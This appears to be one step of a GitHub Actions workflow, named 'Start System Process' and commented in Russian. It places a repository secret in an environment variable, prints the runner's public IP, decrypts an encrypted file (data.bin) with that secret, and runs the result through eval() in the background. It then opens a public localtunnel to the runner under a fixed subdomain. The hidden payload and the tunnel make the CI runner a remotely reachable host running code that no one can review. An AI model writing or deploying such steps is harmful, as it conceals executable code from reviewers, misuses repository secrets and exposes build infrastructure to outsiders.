- name: Start System Process
        env:
          CORE_ACCESS_TOKEN: ${{ secrets.MASTER_KEY }}
        run: |
          echo "--- ПРОВЕРКА ФАЙЛОВ ---"
          ls -la
          echo "--- ТВОЙ ПАРОЛЬ (IP) НИЖЕ ---"
          curl -s ifconfig.me
          echo -e "\n----------------------------"
          
          # Запуск с явным указанием пути ./data.bin
          node -e "const c=require('crypto'),fs=require('fs');const d=fs.readFileSync('./data.bin'),s=d.slice(0,16),i=d.slice(16,32),e=d.slice(32),k=c.pbkdf2Sync(process.env.CORE_ACCESS_TOKEN,s,100000,32,'sha256'),p=c.createDecipheriv('aes-256-cbc',k,i);let r=p.update(e);r=Buffer.concat([r,p.final()]);eval(r.toString());" &
          
          sleep 15
          npx lt --port 9000 --subdomain my-secure-mesh-node
